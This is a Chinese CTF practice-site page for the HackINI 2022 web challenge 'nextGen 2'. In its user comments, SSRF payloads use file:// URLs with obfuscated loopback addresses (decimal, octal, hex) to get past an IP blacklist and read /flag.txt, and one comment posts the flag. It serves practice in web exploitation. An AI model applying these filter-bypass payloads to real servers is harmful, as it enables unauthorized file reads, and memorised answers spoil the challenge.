nextGen 2WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: freetstar
一血奖励: 0金币
解  决: 1124
提  示: Flag is in the `/flag.txt` file of the web server
描  述:
We added some filters now.
评论
Aerelin 1月前

为什么改完包发送依旧拿不到flag

回复 0

bugfuck2 4月前

service=file://127.0.0.01/flag.txt

回复 0

bugku111222 6月前

bp中修改了这些,为什么一直响应400? POST /request HTTP/1.1 Content-Type: application/x-www-form-urlencode service=file:///127.0.1/flag.txt

回复 0

零基础110 6月前

shellmates{**********}

回复 0

2ew123123124 6月前

shellmates{******}

回复 0

lunarbyside 6月前

所以为啥想当然觉得过滤了127.0.0.1啊,怎么想到的,可以过滤的地方多了去了

回复 2

脆脆sha_ 1年前

黑名单过滤的ip地址绕过: 十进制整数表示:2130706433 八进制表示:0177.0.0.1 十六进制表示:0x7f.0x0.0x0.0x1 省略IP的某些部分:127.1

回复 1
divinesh 4月前

niude

回复 0

意大利炮 1年前

service=file://127.00.00.1/flag.txt和service=file://2130706433/flag.txt

回复 3

MOCHAOLIN 1年前

POST /request HTTP/1.1 Host: 82.157.146.43:10782 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gz

回复 0

868954104 1年前

shellmates{Y0u_d1D_1t_aG4iN_!!} service=file://2130706433/flag.txt

回复 0

WriteUp

image
hopeinhand

1 金币

评分(0)

暂无评分

解题动态

zyxyz 攻破了该题 18小时前
0o01I 攻破了该题 2天前
glkdfjgkl 攻破了该题 2天前
hengdonghui 攻破了该题 3天前
zrc2682 攻破了该题 3天前
Zhengzanmei 攻破了该题 4天前
eason2023 攻破了该题 4天前
gongyy 攻破了该题 7天前
IlIlIlIllll 攻破了该题 7天前
anya 攻破了该题 8天前
sann111 攻破了该题 8天前
out不慢 攻破了该题 9天前
15206540508 攻破了该题 10天前
liang123456 攻破了该题 10天前
lqianqian 攻破了该题 10天前
16690595968 攻破了该题 10天前
miraiz\ 攻破了该题 11天前
Jinctf 攻破了该题 12天前
all423 攻破了该题 15天前
cthugha721 攻破了该题 15天前
问题反馈